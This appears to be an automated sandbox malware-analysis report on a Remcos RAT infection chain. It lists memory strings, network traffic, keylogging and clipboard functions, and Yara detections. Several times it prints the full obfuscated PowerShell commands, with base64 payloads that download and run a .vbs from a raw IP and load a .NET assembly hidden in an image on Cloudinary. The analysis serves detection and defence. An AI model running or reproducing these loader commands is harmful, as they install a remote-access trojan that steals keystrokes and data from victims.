Source: powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:
Source: powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFl
Source: CasPol.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000003.00000002.2201944807.000000000513E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2201379417.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comcationProtocols.Commands/WOW64
Source: powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49759 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

11_2_004099E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_00409B10

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0041BB87 SystemParametersInfoW,

11_2_0041BB87

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsIC